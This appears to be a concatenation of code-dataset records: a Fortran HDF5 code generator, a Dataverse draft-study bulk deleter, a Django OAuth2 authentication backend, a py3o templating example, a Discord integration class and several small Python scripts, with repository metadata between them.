max_dims(%i) = H5S_UNLIMITED_F
call h5screate_simple_f(rank, dims, file_s, h5_error, max_dims)
chunk_dims(%i) = 128
call h5pcreate_f(H5P_DATASET_CREATE_F, plist, h5_error)
call h5pset_chunk_f(plist, rank, chunk_dims, h5_error)
call h5dcreate_f(g_id, 'value', %s, file_s, ID%% d_id, h5_error, plist)
call h5pclose_f(plist, h5_error)
call h5sclose_f(file_s, h5_error)
deallocate(dims) ; deallocate(max_dims) ; deallocate(chunk_dims)
if (present(link_from)) then
call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/step', g_id, 'step', h5_error)
call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/time', g_id, 'time', h5_error)
else
call h5md_create_step_time(g_id)
end if
call h5dopen_f(g_id, 'step', ID%% s_id, h5_error)
call h5dopen_f(g_id, 'time', ID%% t_id, h5_error)
call h5gclose_f(g_id, h5_error)
end subroutine h5md_create_obs_%s%s
""" % (rank,rank,rank, H5T[t_k],t_k,d_k)
print s
| 30.72549
| 107
| 0.624442
|
#!/usr/bin/env python
# Copyright 2011-2013 Pierre de Buyl
#
# This file is part of f90h5md
#
# f90h5md is free software and is licensed under the modified BSD license (see
# LICENSE file).
# Code generator: prints the family of Fortran `h5md_create_obs_<type><rank>`
# subroutines (one per type code x rank code) to standard output.
# Fix: `.iteritems()` and the `print` statement are Python-2-only; `.items()`
# and `print(s)` behave identically on Python 2 and also run on Python 3.
# Type code -> Fortran type declaration.
types = dict()
types['i'] = 'integer'
types['d'] = 'double precision'
# Type code -> HDF5 native type constant.
H5T = dict()
H5T['i'] = 'H5T_NATIVE_INTEGER'
H5T['d'] = 'H5T_NATIVE_DOUBLE'
# Rank code -> dummy-argument dimension spec ('s' = scalar observable).
dims = dict()
dims['s'] = ''
dims['1'] = '(:)'
dims['2'] = '(:,:)'
dims['3'] = '(:,:,:)'
dims['4'] = '(:,:,:,:)'
for t_k,t_v in types.items():
    for d_k,d_v in dims.items():
        # The HDF5 dataset rank is the data rank plus one unlimited time axis.
        if (d_k == 's'):
            rank = 1
        else:
            rank = int(d_k)+1
        s=''
        s+=""" !> Sets up a h5md_t variable.
    !! @param file_id ID of the file.
    !! @param name Name of the observable
    !! @param ID Resulting h5md_t variable
    !! @param data The data that will fit into the observable.
    !! @param link_from Indicates if the step and time for this observable should be linked from another one.
    !! @param override_obs Indicates if the data should be stored outside of /observables.
    !! @private"""
        s+="""
  subroutine h5md_create_obs_%s%s(file_id, name, ID, data, link_from, override_obs)
    integer(HID_T), intent(inout) :: file_id
    character(len=*), intent(in) :: name
    type(h5md_t), intent(out) :: ID
    %s, intent(in) :: data%s
    character(len=*), intent(in), optional :: link_from
    character(len=*), intent(in), optional :: override_obs
    integer(HID_T) :: file_s, plist, g_id
    integer(HSIZE_T), allocatable :: dims(:), max_dims(:), chunk_dims(:)
    integer :: rank
    character(len=64) :: g_name
    if (present(override_obs)) then
       g_name = override_obs
    else
       g_name = 'observables'
    end if
    call h5gcreate_f(file_id, trim(g_name)//'/'//name, g_id, h5_error)
    rank = %i
    allocate(dims(rank)) ; allocate(max_dims(rank)) ; allocate(chunk_dims(rank))
""" % (t_k,d_k, t_v, d_v, rank )
        if (d_k!='s'):
            s+="""
    dims(1:%i) = shape(data)
    max_dims(1:%i) = shape(data)
    chunk_dims(1:%i) = shape(data)
""" % (rank-1, rank-1, rank-1)
        s+="""
    dims(%i) = 0
    max_dims(%i) = H5S_UNLIMITED_F
    call h5screate_simple_f(rank, dims, file_s, h5_error, max_dims)
    chunk_dims(%i) = 128
    call h5pcreate_f(H5P_DATASET_CREATE_F, plist, h5_error)
    call h5pset_chunk_f(plist, rank, chunk_dims, h5_error)
    call h5dcreate_f(g_id, 'value', %s, file_s, ID%% d_id, h5_error, plist)
    call h5pclose_f(plist, h5_error)
    call h5sclose_f(file_s, h5_error)
    deallocate(dims) ; deallocate(max_dims) ; deallocate(chunk_dims)
    if (present(link_from)) then
       call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/step', g_id, 'step', h5_error)
       call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/time', g_id, 'time', h5_error)
    else
       call h5md_create_step_time(g_id)
    end if
    call h5dopen_f(g_id, 'step', ID%% s_id, h5_error)
    call h5dopen_f(g_id, 'time', ID%% t_id, h5_error)
    call h5gclose_f(g_id, h5_error)
  end subroutine h5md_create_obs_%s%s
""" % (rank,rank,rank, H5T[t_k],t_k,d_k)
        print(s)
| 0
| 0
| 0
|
9c74df1de285f8990eac45aebad0a4ff62e8d973
| 4,531
|
py
|
Python
|
scripts/dv_del.py
|
ubc-library-rc/dataverse_utils
|
3fbf3e90bba64b84fa141145a27a9ff787507eb7
|
[
"MIT"
] | null | null | null |
scripts/dv_del.py
|
ubc-library-rc/dataverse_utils
|
3fbf3e90bba64b84fa141145a27a9ff787507eb7
|
[
"MIT"
] | 7
|
2021-07-30T23:26:48.000Z
|
2021-10-05T21:34:36.000Z
|
scripts/dv_del.py
|
ubc-library-rc/dataverse_utils
|
3fbf3e90bba64b84fa141145a27a9ff787507eb7
|
[
"MIT"
] | null | null | null |
#!python
'''Dataverse Bulk Deleter
Deletes unpublished studies at the command line
'''
import argparse
#import json
import sys
import requests
VERSION = (0, 2, 1)
__version__ = '.'.join([str(x) for x in VERSION])
def delstudy(dvurl, key, pid):
'''
Deletes Dataverse study
dvurl : str
Dataverse installation base URL
key : str
Dataverse user API key
pid : str
Dataverse collection study persistent identifier
'''
try:
deler = requests.delete(f'{dvurl}/api/datasets/:persistentId/versions/:draft',
headers={'X-Dataverse-key':key},
params={'persistentId':pid},
timeout=30)
if deler.status_code == 200:
return f'Deleted {pid}'
deler.raise_for_status()
return None
except requests.exceptions.HTTPError:
return f'Failed to delete {pid}. \n Message: {deler.text}'
def conf(tex):
'''
Confirmation dialogue checker. Returns true if "Y" or "y"
'''
yes = input(f'Delete {tex}? ')
if yes.lower() == 'y':
return True
return False
def getsize(dvurl, pid, key):
    '''
    Returns size of Dataverse study. Mostly here for debugging.
    dvurl : str
        Dataverse installation base URL
    pid : str
        Dataverse collection study persistent identifier
    key : str
        Dataverse user API key

    Returns (size_in_bytes, sleeptime_in_seconds); (0, 0) on an HTTP error.
    '''
    try:
        sizer = requests.get(f'{dvurl}/api/datasets/:persistentId/storagesize',
                             headers={'X-Dataverse-key':key},
                             params={'persistentId':pid},
                             timeout=10)
        # Message ends with "... : 1,234,567 bytes"; slice out the number part.
        text = sizer.json()['data']['message']
        text = text[text.rfind(':')+2 : -6]
        text = text.split(',')
        size = int(''.join(text))
        # BUG FIX: the original computed `text//1024//1024/10`, floor-dividing
        # a list of strings (TypeError); the byte count `size` was intended.
        sleeptime = size//1024//1024/10 # sleep for 1/10th sec per megabyte
        return (size, sleeptime)
    except requests.exceptions.HTTPError:
        return (0, 0)
def main():
'''
Command line bulk deleter
'''
parser = argparse.ArgumentParser(description='Delete draft studies from a Dataverse collection')
parser.add_argument('-k', '--key', help='Dataverse user API key', required=True, dest='key')
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--dataverse',
help=('Dataverse collection short name from which '
'to delete all draft records. eg. "ldc"'),
dest='dataverse')
group.add_argument('-p', '--persistentId',
help='Handle or DOI to delete in format hdl:11272.1/FK2/12345',
dest='pid')
parser.add_argument('-i', '--interactive',
help="Confirm each study deletion",
action='store_true', dest='conf')
parser.add_argument('-u', '--url', help='URL to base Dataverse installation',
default='https://soroban.library.ubc.ca', dest='dvurl')
parser.add_argument('--version', action='version',
version='%(prog)s '+__version__,
help='Show version number and exit')
args = parser.parse_args()
args.dvurl = args.dvurl.strip('/')
if args.dataverse:
info = requests.get(f'{args.dvurl}/api/dataverses/{args.dataverse}/contents',
headers={'X-Dataverse-key': args.key}, timeout=10).json()
pids = [f'{x["protocol"]}:{x["authority"]}/{x["identifier"]}' for x in info['data']]
if not pids:
print(f'Dataverse collection {args.dataverse} empty')
for pid in pids:
try:
if args.conf:
if conf(pid):
print(delstudy(args.dvurl, args.key, pid))
continue
print(f'Skipping {pid}')
continue
print(delstudy(args.dvurl, args.key, pid))
#time.sleep(getsize(pid, args.key)[1])#Will this stop the server crash?
except KeyboardInterrupt:
print('Aborted by user')
sys.exit()
if args.pid:
if args.conf:
if conf(args.pid):
print(delstudy(args.dvurl, args.key, args.pid))
else:
print(f'Aborting delete of {args.pid}')
else:
print(delstudy(args.dvurl, args.key, args.pid))
if __name__ == '__main__':
main()
| 35.398438
| 100
| 0.546237
|
#!python
'''Dataverse Bulk Deleter
Deletes unpublished studies at the command line
'''
import argparse
#import json
import sys
import requests
VERSION = (0, 2, 1)
__version__ = '.'.join([str(x) for x in VERSION])
def delstudy(dvurl, key, pid):
    '''
    Deletes Dataverse study (draft version only).
    dvurl : str
        Dataverse installation base URL
    key : str
        Dataverse user API key
    pid : str
        Dataverse collection study persistent identifier

    Returns a status message string on success or HTTP failure; returns None
    if the DELETE neither returns 200 nor raises for status.
    '''
    try:
        deler = requests.delete(f'{dvurl}/api/datasets/:persistentId/versions/:draft',
                                headers={'X-Dataverse-key':key},
                                params={'persistentId':pid},
                                timeout=30)
        if deler.status_code == 200:
            return f'Deleted {pid}'
        # Non-200: raise so the handler below can format the error message.
        deler.raise_for_status()
        return None
    except requests.exceptions.HTTPError:
        return f'Failed to delete {pid}. \n Message: {deler.text}'
def conf(tex):
    '''
    Ask the user to confirm an action on *tex*.

    Returns True only when the reply is "y" or "Y".
    '''
    reply = input(f'Delete {tex}? ')
    return reply.lower() == 'y'
def getsize(dvurl, pid, key):
    '''
    Returns size of Dataverse study. Mostly here for debugging.
    dvurl : str
        Dataverse installation base URL
    pid : str
        Dataverse collection study persistent identifier
    key : str
        Dataverse user API key

    Returns (size_in_bytes, sleeptime_in_seconds); (0, 0) on an HTTP error.
    '''
    try:
        sizer = requests.get(f'{dvurl}/api/datasets/:persistentId/storagesize',
                             headers={'X-Dataverse-key':key},
                             params={'persistentId':pid},
                             timeout=10)
        # Message ends with "... : 1,234,567 bytes"; slice out the number part.
        text = sizer.json()['data']['message']
        text = text[text.rfind(':')+2 : -6]
        text = text.split(',')
        size = int(''.join(text))
        # BUG FIX: the original computed `text//1024//1024/10`, floor-dividing
        # a list of strings (TypeError); the byte count `size` was intended.
        sleeptime = size//1024//1024/10 # sleep for 1/10th sec per megabyte
        return (size, sleeptime)
    except requests.exceptions.HTTPError:
        return (0, 0)
def main():
    '''
    Command line bulk deleter: deletes either every draft study in a
    Dataverse collection (-d) or a single study by persistent ID (-p),
    optionally confirming each deletion interactively (-i).
    '''
    parser = argparse.ArgumentParser(description='Delete draft studies from a Dataverse collection')
    parser.add_argument('-k', '--key', help='Dataverse user API key', required=True, dest='key')
    # -d (whole collection) and -p (single study) are mutually exclusive.
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-d', '--dataverse',
                       help=('Dataverse collection short name from which '
                             'to delete all draft records. eg. "ldc"'),
                       dest='dataverse')
    group.add_argument('-p', '--persistentId',
                       help='Handle or DOI to delete in format hdl:11272.1/FK2/12345',
                       dest='pid')
    parser.add_argument('-i', '--interactive',
                        help="Confirm each study deletion",
                        action='store_true', dest='conf')
    parser.add_argument('-u', '--url', help='URL to base Dataverse installation',
                        default='https://soroban.library.ubc.ca', dest='dvurl')
    parser.add_argument('--version', action='version',
                        version='%(prog)s '+__version__,
                        help='Show version number and exit')
    args = parser.parse_args()
    args.dvurl = args.dvurl.strip('/')
    if args.dataverse:
        # List the collection's contents and build the persistent IDs to delete.
        info = requests.get(f'{args.dvurl}/api/dataverses/{args.dataverse}/contents',
                            headers={'X-Dataverse-key': args.key}, timeout=10).json()
        pids = [f'{x["protocol"]}:{x["authority"]}/{x["identifier"]}' for x in info['data']]
        if not pids:
            print(f'Dataverse collection {args.dataverse} empty')
        for pid in pids:
            try:
                if args.conf:
                    if conf(pid):
                        print(delstudy(args.dvurl, args.key, pid))
                        continue
                    print(f'Skipping {pid}')
                    continue
                print(delstudy(args.dvurl, args.key, pid))
                #time.sleep(getsize(pid, args.key)[1])#Will this stop the server crash?
            except KeyboardInterrupt:
                # Allow Ctrl-C to abort the bulk run cleanly.
                print('Aborted by user')
                sys.exit()
    if args.pid:
        if args.conf:
            if conf(args.pid):
                print(delstudy(args.dvurl, args.key, args.pid))
            else:
                print(f'Aborting delete of {args.pid}')
        else:
            print(delstudy(args.dvurl, args.key, args.pid))
if __name__ == '__main__':
main()
| 0
| 0
| 0
|
17b91ebb149ff794e7ab9e3c0e500dbf74dd6ee0
| 2,039
|
py
|
Python
|
src/common.py
|
nagisc007/pythoncitest
|
5200f1e8ae2969ffb733fb2239e9bbb7e700e836
|
[
"MIT"
] | null | null | null |
src/common.py
|
nagisc007/pythoncitest
|
5200f1e8ae2969ffb733fb2239e9bbb7e700e836
|
[
"MIT"
] | null | null | null |
src/common.py
|
nagisc007/pythoncitest
|
5200f1e8ae2969ffb733fb2239e9bbb7e700e836
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from acttypes import ActType
class Act(object):
""" basic action class.
"""
class Title(Act):
""" For title act
"""
class Chapter(Act):
""" For chapter start act
"""
class Description(Act):
""" Nothing subject description act.
"""
class Person(object):
""" basic character class.
"""
def tell(self, what, desc="", with_subject=False):
''' For dialogue
'''
return Act(self, ActType.TELL, "「{}」".format(what), desc, with_subject)
class Stage(object):
""" basic stage class.
"""
class Item(object):
""" basic item class.
"""
class DayTime(object):
""" basic day and time class.
"""
| 23.436782
| 83
| 0.583619
|
# -*- coding: utf-8 -*-
from acttypes import ActType
class Act(object):
    """Basic action container.

    Holds who acts (subject), the kind of act (act_type), the act text
    itself (action), an optional description, and whether the subject
    should be rendered explicitly.
    """
    def __init__(self, subject, act_type, action, description, with_subject=False):
        # Plain data holder; no validation is performed on purpose.
        self.subject = subject
        self.act_type = act_type
        self.action = action
        self.description = description
        self.with_subject = with_subject
class Title(Act):
    """ For title act
    """
    def __init__(self, title, desc=""):
        # NOTE(review): `self` is passed explicitly in addition to the implicit
        # binding, so the created act's `subject` is the Title object itself —
        # confirm this is intentional.
        super().__init__(self, ActType.SYMBOL, title, desc)
class Chapter(Act):
    """ For chapter start act
    """
    def __init__(self, chapter_title, desc=""):
        # NOTE(review): `self` is passed explicitly in addition to the implicit
        # binding, so the act's `subject` is the Chapter object itself —
        # confirm this is intentional.
        super().__init__(self, ActType.SYMBOL, chapter_title, desc)
class Description(Act):
    """ Nothing subject description act.
    """
    def __init__(self, act, desc=""):
        # NOTE(review): `self` is passed explicitly in addition to the implicit
        # binding, so the act's `subject` is the Description object itself —
        # confirm this is intentional.
        super().__init__(self, ActType.DESC, act, desc)
class Person(object):
    """Basic character: name, age, sex and job, plus a dialogue helper."""
    def __init__(self, name, age, sex, job):
        # Plain data holder; no validation on purpose.
        self.name, self.age = name, age
        self.sex, self.job = sex, job
    def tell(self, what, desc="", with_subject=False):
        """Build a TELL act that wraps *what* in Japanese corner brackets."""
        quoted = "「{}」".format(what)
        return Act(self, ActType.TELL, quoted, desc, with_subject)
class Stage(object):
    """Basic stage (location) with a descriptive act."""
    def __init__(self, name, act):
        self.name, self.act = name, act
    def description(self, desc=""):
        """Wrap this stage's act into a DESC-type Act."""
        return Act(self, ActType.DESC, self.act, desc)
class Item(object):
    """Basic item with a descriptive act."""
    def __init__(self, name, act):
        self.name, self.act = name, act
    def description(self, desc=""):
        """Wrap this item's act into a DESC-type Act."""
        return Act(self, ActType.DESC, self.act, desc)
class DayTime(object):
    """Basic date/time marker with a descriptive act."""
    def __init__(self, act, mon=0, day=0, year=0, hour=0):
        # All date components default to 0 ("unspecified").
        self.act = act
        self.year, self.mon = year, mon
        self.day, self.hour = day, hour
    def description(self, desc=""):
        """Wrap this day/time's act into a DESC-type Act."""
        return Act(self, ActType.DESC, self.act, desc)
| 1,037
| 0
| 289
|
3f6fab9af2fd1b2e838b7fc2b62a4615070a323a
| 644
|
py
|
Python
|
oauth2_provider/backends.py
|
grnspace/django-oauth-toolkit
|
3d876563a2528eadac0f832f360a0b269b99b94e
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2021-03-21T03:35:24.000Z
|
2021-04-20T05:49:19.000Z
|
oauth2_provider/backends.py
|
grnspace/django-oauth-toolkit
|
3d876563a2528eadac0f832f360a0b269b99b94e
|
[
"BSD-2-Clause-FreeBSD"
] | 4
|
2018-06-20T11:33:43.000Z
|
2021-05-28T08:02:21.000Z
|
oauth2_provider/backends.py
|
grnspace/django-oauth-toolkit
|
3d876563a2528eadac0f832f360a0b269b99b94e
|
[
"BSD-2-Clause-FreeBSD"
] | 4
|
2018-06-20T11:14:46.000Z
|
2021-05-21T15:56:02.000Z
|
from django.contrib.auth import get_user_model
from .oauth2_backends import get_oauthlib_core
UserModel = get_user_model()
OAuthLibCore = get_oauthlib_core()
class OAuth2Backend:
"""
Authenticate against an OAuth2 access token
"""
| 23.851852
| 70
| 0.650621
|
from django.contrib.auth import get_user_model
from .oauth2_backends import get_oauthlib_core
UserModel = get_user_model()
OAuthLibCore = get_oauthlib_core()
class OAuth2Backend:
    """
    Authenticate against an OAuth2 access token
    """
    def authenticate(self, request=None, **credentials):
        # Django authentication-backend hook: return the token's user when the
        # request carries a valid OAuth2 access token, otherwise None.
        # `credentials` is accepted for backend-interface compatibility but is
        # not used here.
        if request is not None:
            valid, r = OAuthLibCore.verify_request(request, scopes=[])
            if valid:
                return r.user
        return None
    def get_user(self, user_id):
        # Standard backend hook: resolve a primary key to a user instance,
        # or None if the user no longer exists.
        try:
            return UserModel.objects.get(pk=user_id)
        except UserModel.DoesNotExist:
            return None
| 342
| 0
| 54
|
2249f1f9badf4ea52249baafff8509a9ed842631
| 875
|
py
|
Python
|
example/example_single_cell.py
|
Yuego/py3o.template
|
d89293d8154a880e5245df30515ace82effc77e1
|
[
"MIT"
] | null | null | null |
example/example_single_cell.py
|
Yuego/py3o.template
|
d89293d8154a880e5245df30515ace82effc77e1
|
[
"MIT"
] | null | null | null |
example/example_single_cell.py
|
Yuego/py3o.template
|
d89293d8154a880e5245df30515ace82effc77e1
|
[
"MIT"
] | null | null | null |
from py3o.template import Template
t = Template(
"py3o_example_template_single_cell.odt",
"py3o_example_output_single_cell.odt"
)
t.set_image_path('staticimage.logo', 'images/new_logo.png')
items = list()
item1 = Item()
item1.val1 = 'Item1 Value1'
item1.val2 = 'Item1 Value2'
item1.val3 = 'Item1 Value3'
item1.Currency = 'EUR'
item1.Amount = '12,345.35'
item1.InvoiceRef = '#1234'
items.append(item1)
for i in xrange(1000):
item = Item()
item.val1 = 'Item%s Value1' % i
item.val2 = 'Item%s Value2' % i
item.val3 = 'Item%s Value3' % i
item.Currency = 'EUR'
item.Amount = '6,666.77'
item.InvoiceRef = 'Reference #%04d' % i
items.append(item)
document = Item()
document.total = '9,999,999,999,999.999'
data = dict(items=items, document=document)
t.render(data)
| 21.875
| 60
| 0.645714
|
from py3o.template import Template
# Template source and rendered-output paths for the single-cell example.
t = Template(
    "py3o_example_template_single_cell.odt",
    "py3o_example_output_single_cell.odt"
)
t.set_image_path('staticimage.logo', 'images/new_logo.png')
class Item(object):
    # Bare attribute bag; fields are attached dynamically below.
    pass
items = list()
item1 = Item()
item1.val1 = 'Item1 Value1'
item1.val2 = 'Item1 Value2'
item1.val3 = 'Item1 Value3'
item1.Currency = 'EUR'
item1.Amount = '12,345.35'
item1.InvoiceRef = '#1234'
items.append(item1)
# Generate 1000 more synthetic invoice rows.
# NOTE(review): `xrange` is Python 2 only — this script fails on Python 3 as-is.
for i in xrange(1000):
    item = Item()
    item.val1 = 'Item%s Value1' % i
    item.val2 = 'Item%s Value2' % i
    item.val3 = 'Item%s Value3' % i
    item.Currency = 'EUR'
    item.Amount = '6,666.77'
    item.InvoiceRef = 'Reference #%04d' % i
    items.append(item)
document = Item()
document.total = '9,999,999,999,999.999'
# Render the template with the generated items and the document totals.
data = dict(items=items, document=document)
t.render(data)
| 0
| 8
| 25
|
5e529e7707da7ca177bde6d4d7eadd1ee8b03b6b
| 468
|
py
|
Python
|
lesson 6/question 7.py
|
Kev-in123/ICS2O7
|
425c59975d4ce6aa0937fd8715b51d04487e4fa9
|
[
"MIT"
] | 2
|
2021-08-10T18:16:08.000Z
|
2021-09-26T19:49:26.000Z
|
lesson 6/question 7.py
|
Kev-in123/ICS2O7
|
425c59975d4ce6aa0937fd8715b51d04487e4fa9
|
[
"MIT"
] | null | null | null |
lesson 6/question 7.py
|
Kev-in123/ICS2O7
|
425c59975d4ce6aa0937fd8715b51d04487e4fa9
|
[
"MIT"
] | null | null | null |
# Simple four-function calculator: read two numbers and an operator, print the result.
num1 = float(input("Number 1: "))
num2 = float(input("Number 2: "))  # fixed typo: prompt previously read "Wumber 2: "
operation = input("Which operation (+,-,/,*): ")
# The operator can only match one branch, so use an elif chain.
if operation == "+":
    print(f"The sum is {num1 + num2}")
elif operation == "-":
    print(f"The difference is {num1 - num2}")
elif operation == "/":
    # Guard against division by zero instead of crashing.
    if num2 != 0:
        print(f"The quotient is {num1 / num2}")
    else:
        print("Cannot divide any number by zero!")
elif operation == "*":
    print(f"The product is {num1 * num2}")
| 24.631579
| 49
| 0.557692
|
# Simple four-function calculator: read two numbers and an operator, print the result.
num1 = float(input("Number 1: "))
num2 = float(input("Number 2: "))  # fixed typo: prompt previously read "Wumber 2: "
operation = input("Which operation (+,-,/,*): ")
# The operator can only match one branch, so use an elif chain.
if operation == "+":
    print(f"The sum is {num1 + num2}")
elif operation == "-":
    print(f"The difference is {num1 - num2}")
elif operation == "/":
    # Guard against division by zero instead of crashing.
    if num2 != 0:
        print(f"The quotient is {num1 / num2}")
    else:
        print("Cannot divide any number by zero!")
elif operation == "*":
    print(f"The product is {num1 * num2}")
| 0
| 0
| 0
|
5e3b4e520e44677ef5084651d4a02fae10e6565f
| 3,574
|
py
|
Python
|
hata/discord/integration/integration_detail.py
|
Multiface24111/hata
|
cd28f9ef158e347363669cc8d1d49db0ff41aba0
|
[
"0BSD"
] | 173
|
2019-06-14T20:25:00.000Z
|
2022-03-21T19:36:10.000Z
|
hata/discord/integration/integration_detail.py
|
Multiface24111/hata
|
cd28f9ef158e347363669cc8d1d49db0ff41aba0
|
[
"0BSD"
] | 52
|
2020-01-03T17:05:14.000Z
|
2022-03-31T11:39:50.000Z
|
hata/discord/integration/integration_detail.py
|
Multiface24111/hata
|
cd28f9ef158e347363669cc8d1d49db0ff41aba0
|
[
"0BSD"
] | 47
|
2019-11-09T08:46:45.000Z
|
2022-03-31T14:33:34.000Z
|
__all__ = ('IntegrationDetail', )
from ..core import ROLES
from ..utils import timestamp_to_datetime, DISCORD_EPOCH_START
from ..role import create_partial_role_from_id
from .preinstanced import IntegrationExpireBehavior
class IntegrationDetail:
"""
Details about a non discord integration.
Attributes
----------
expire_behavior : ``IntegrationExpireBehavior``
The behavior of expiring subscription.
expire_grace_period : `int`
The grace period in days for expiring subscribers. Can be `1`, `3`, `7`, `14` or `30`. If the integration is
partial, or is not applicable for it, then is set as `-1`.
role_id : `int`
The role's identifier what the integration uses for subscribers.
subscriber_count : `int`
How many subscribers the integration has. Defaults to `0`.
synced_at : `datetime`
When the integration was last synced.
syncing : `bool`
Whether the integration syncing.
"""
__slots__ = ('expire_behavior', 'expire_grace_period', 'role_id', 'subscriber_count', 'synced_at', 'syncing', )
def __init__(self, data):
"""
Fills up the integration detail from the respective integration's data.
Parameters
----------
data : `dict` of (`str`, `Any`) items
Received integration data.
"""
self.syncing = data.get('syncing', False)
role_id = data.get('role_id', None)
if role_id is None:
role_id = 0
else:
role_id = int(role_id)
self.role_id = role_id
self.expire_behavior = IntegrationExpireBehavior.get(data.get('expire_behavior', 0))
self.expire_grace_period = data.get('expire_grace_period', -1)
try:
synced_at = data['synced_at']
except KeyError:
synced_at = DISCORD_EPOCH_START
else:
synced_at = timestamp_to_datetime(synced_at)
self.synced_at = synced_at
self.subscriber_count = data.get('subscriber_count', 0)
@property
def role(self):
"""
Returns the integration's role.
Returns
-------
role : `None` or ``Role``
"""
role_id = self.role_id
if role_id:
return create_partial_role_from_id(role_id)
@classmethod
def from_role(cls, role):
"""
Creates a partial integration detail with the given role.
Parameters
----------
role : ``Role``
The respective role.
Returns
-------
self : ``IntegrationDetail``
The created integration detail.
"""
self = object.__new__(cls)
self.syncing = False
self.role_id = role.id
self.expire_behavior = IntegrationExpireBehavior.remove_role
self.expire_grace_period = -1
self.synced_at = DISCORD_EPOCH_START
self.subscriber_count = 0
return self
def __repr__(self):
"""Returns the integration detail's representation."""
repr_parts = [
'<', self.__class__.__name__,
]
role_id = self.role_id
if role_id:
try:
role = ROLES[role_id]
except KeyError:
pass
else:
repr_parts.append(' role=')
repr_parts.append(repr(role))
repr_parts.append('>')
return ''.join(repr_parts)
| 30.033613
| 116
| 0.570229
|
__all__ = ('IntegrationDetail', )
from ..core import ROLES
from ..utils import timestamp_to_datetime, DISCORD_EPOCH_START
from ..role import create_partial_role_from_id
from .preinstanced import IntegrationExpireBehavior
class IntegrationDetail:
    """
    Details about a non discord integration.
    Attributes
    ----------
    expire_behavior : ``IntegrationExpireBehavior``
        The behavior of expiring subscription.
    expire_grace_period : `int`
        The grace period in days for expiring subscribers. Can be `1`, `3`, `7`, `14` or `30`. If the integration is
        partial, or is not applicable for it, then is set as `-1`.
    role_id : `int`
        The role's identifier what the integration uses for subscribers.
    subscriber_count : `int`
        How many subscribers the integration has. Defaults to `0`.
    synced_at : `datetime`
        When the integration was last synced.
    syncing : `bool`
        Whether the integration syncing.
    """
    __slots__ = ('expire_behavior', 'expire_grace_period', 'role_id', 'subscriber_count', 'synced_at', 'syncing', )
    def __init__(self, data):
        """
        Fills up the integration detail from the respective integration's data.
        Parameters
        ----------
        data : `dict` of (`str`, `Any`) items
            Received integration data.
        """
        self.syncing = data.get('syncing', False)
        # `0` is the "no role" sentinel, so `role_id` is always an `int`.
        role_id = data.get('role_id', None)
        if role_id is None:
            role_id = 0
        else:
            role_id = int(role_id)
        self.role_id = role_id
        self.expire_behavior = IntegrationExpireBehavior.get(data.get('expire_behavior', 0))
        self.expire_grace_period = data.get('expire_grace_period', -1)
        # Missing `synced_at` falls back to the Discord epoch start.
        try:
            synced_at = data['synced_at']
        except KeyError:
            synced_at = DISCORD_EPOCH_START
        else:
            synced_at = timestamp_to_datetime(synced_at)
        self.synced_at = synced_at
        self.subscriber_count = data.get('subscriber_count', 0)
    @property
    def role(self):
        """
        Returns the integration's role.
        Returns
        -------
        role : `None` or ``Role``
        """
        role_id = self.role_id
        if role_id:
            return create_partial_role_from_id(role_id)
    @classmethod
    def from_role(cls, role):
        """
        Creates a partial integration detail with the given role.
        Parameters
        ----------
        role : ``Role``
            The respective role.
        Returns
        -------
        self : ``IntegrationDetail``
            The created integration detail.
        """
        # Bypass `__init__` — a partial detail has no payload to parse.
        self = object.__new__(cls)
        self.syncing = False
        self.role_id = role.id
        self.expire_behavior = IntegrationExpireBehavior.remove_role
        self.expire_grace_period = -1
        self.synced_at = DISCORD_EPOCH_START
        self.subscriber_count = 0
        return self
    def __repr__(self):
        """Returns the integration detail's representation."""
        repr_parts = [
            '<', self.__class__.__name__,
        ]
        # Only include the role when it is already in the local cache;
        # no partial role is created just for the repr.
        role_id = self.role_id
        if role_id:
            try:
                role = ROLES[role_id]
            except KeyError:
                pass
            else:
                repr_parts.append(' role=')
                repr_parts.append(repr(role))
        repr_parts.append('>')
        return ''.join(repr_parts)
| 0
| 0
| 0
|
6cc1141c1620e59785bdb019aca3300e2db9915b
| 553
|
py
|
Python
|
main.py
|
robingather/com-thesis
|
30a6e815c4f71edc332a4e74a25faf0dd21c1244
|
[
"MIT"
] | null | null | null |
main.py
|
robingather/com-thesis
|
30a6e815c4f71edc332a4e74a25faf0dd21c1244
|
[
"MIT"
] | null | null | null |
main.py
|
robingather/com-thesis
|
30a6e815c4f71edc332a4e74a25faf0dd21c1244
|
[
"MIT"
] | null | null | null |
from controller import Controller
import torch
import cProfile
import pstats
OPTIMIZE = False # True to generate performance reports
if OPTIMIZE:
cProfile.run('main()', "output.dat")
with open("output_time.txt","w") as f:
p = pstats.Stats("output. dat", stream=f)
p.sort_stats("time").print_stats()
with open("output_calls.txt","w") as f:
p = pstats.Stats("output.dat", stream=f)
p.sort_stats("calls").print_stats()
else:
main()
| 25.136364
| 55
| 0.636528
|
from controller import Controller
import torch
import cProfile
import pstats
OPTIMIZE = False # True to generate performance reports
def main():
    """Entry point: run the Controller with autograd disabled."""
    # Inference only — no gradients are needed anywhere in the run.
    with torch.no_grad():
        controller = Controller()
        controller.run()
if OPTIMIZE:
cProfile.run('main()', "output.dat")
with open("output_time.txt","w") as f:
p = pstats.Stats("output. dat", stream=f)
p.sort_stats("time").print_stats()
with open("output_calls.txt","w") as f:
p = pstats.Stats("output.dat", stream=f)
p.sort_stats("calls").print_stats()
else:
main()
| 43
| 0
| 25
|
b77e52d98375ce98d4528ec49707a93bfcb316e0
| 169
|
py
|
Python
|
nodeClasses/startNode.py
|
marios-stam/PathFinding
|
b6f7d438fe8c2569db85d6c3d508846ccc3bc863
|
[
"MIT"
] | null | null | null |
nodeClasses/startNode.py
|
marios-stam/PathFinding
|
b6f7d438fe8c2569db85d6c3d508846ccc3bc863
|
[
"MIT"
] | null | null | null |
nodeClasses/startNode.py
|
marios-stam/PathFinding
|
b6f7d438fe8c2569db85d6c3d508846ccc3bc863
|
[
"MIT"
] | null | null | null |
from nodeClasses.node import node
| 18.777778
| 35
| 0.615385
|
from nodeClasses.node import node
class startNode(node):
    """Path-finding start node; its f-cost is always zero."""

    def __init__(self, x, y):
        # Delegate coordinate setup to the base node class.
        node.__init__(self, x, y)

    def getFcost(self):
